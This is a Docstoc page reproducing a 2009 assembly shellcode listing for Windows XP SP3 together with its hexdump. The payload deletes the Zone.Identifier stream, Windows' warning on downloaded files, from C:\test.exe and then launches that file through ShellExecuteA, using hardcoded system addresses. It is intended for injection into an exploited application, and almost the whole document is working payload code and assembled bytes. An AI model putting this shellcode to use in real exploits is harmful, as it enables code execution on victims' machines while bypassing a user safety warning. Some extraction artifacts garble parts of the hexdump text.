Docstoc

Win32 XP SP3 ShellExecuteA shellcode

Document Sample
Win32 XP SP3 ShellExecuteA shellcode Powered By Docstoc
					                                         Win32 XP SP3 ShellExecuteA shellcode         Page 1/2
   1     ;   Author: sinn3r (x90.sinner {a.t} gmail.c0m)
   2     ;   Tested on Windows XP SP3
   3     ;   Description:
   4     ;   This shellcode will attempt to delete the Zone.Identifier ADS (it’s a
   5     ;   trick Microsoft uses to warn you about an exe when you try to run it),
   6     ;   and then run the file using the ShellExecuteA function.
   7     ;   Make sure the exploited app has the following components loaded
   8     ;   (should be pretty common):
   9     ;   KERNEL32, msvcrt, SHELL32
  10
  11     [BITS 32]
  12
  13     global _start
  14
  15     _start:
  16
  17     push 0x00657865
  18     push 0x2e747365
  19     push 0x745c3a43
  20     xor edi, edi
  21     mov edi, esp              ; edi = "C:\test.exe"
  22
  23     xor esi, esi
  24     push 0x00004154
  25     push 0x4144243a
  26     push 0x72656966
  27     push 0x69746e65
  28     push 0x64492e65
  29     push 0x6e6f5a3a
  30     mov esi, esp              ; edi = fork
  31
  32     push esi
  33     push edi
  34     xor eax, eax
  35     mov eax, 0x77C46040       ; msvcrt.strcat    (Windows XP SP3)
  36     call eax
  37
  38     xor eax, eax
  39     mov eax, 0x7c831ec5       ; KERNEL32.DeleteFileA   (Windows XP SP3)
  40     call eax
  41
  42     xor edx, edx
  43     mov word [edi + 11], dx
  44
  45     push edx
  46     push 0x6e65706f
  47     mov edx, esp              ; edx = "open"
  48     xor eax, eax
  49     push eax                  ;   IsShown = NULL
  50     push eax                  ;   DefDir = NULL
  51     push eax                  ;   Parameters = NULL
  52     push edi                  ;   Filename
sinn3r                                                                                12/19/2009
                                         Win32 XP SP3 ShellExecuteA shellcode                                             Page 2/2
  53     push edx                  ; Operation = "open"
  54     push eax                  ; hwnd = NULL
  55     mov eax, 0x7ca41150       ; SHELL32.ShellExecuteA      (Windows XP SP3)
  56     call eax
  57
  58     ;   shellcode:
  59     ;   sinn3r@backtrack:~$ nasm   −f   bin shellexecute.asm −o shellexecute | cat shellexecute |hexdump −C |grep −v 00000066
  60     ;   00000000 68 65 78 65 00    68   65 73 74 2e 68 43 3a 5c 74 31 |hexe.hest.hC:\t1|
  61     ;   00000010 ff 89 e7 31 f6    68   54 41 00 00 68 3a 24 44 41 68 |...1.hTA..h:$DAh|
  62     ;   00000020 66 69 65 72 68    65   6e 74 69 68 65 2e 49 64 68 3a |fierhentihe.Idh:|
  63     ;   00000030 5a 6f 6e 89 e6    56   57 31 c0 b8 40 60 c4 77 ff d0 |Zon..VW1..@‘.w..|
  64     ;   00000040 31 c0 b8 c5 1e    83   7c ff d0 31 d2 66 89 57 0b 52 |1.....|..1.f.W.R|
  65     ;   00000050 68 6f 70 65 6e    89   e2 31 c0 50 50 50 57 52 50 b8 |hopen..1.PPPWRP.|
  66     ;   00000060 50 11 a4 7c ff    d0                                   |P..|..|




sinn3r                                                                                                                     12/19/2009

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:147
posted:5/23/2010
language:English
pages:2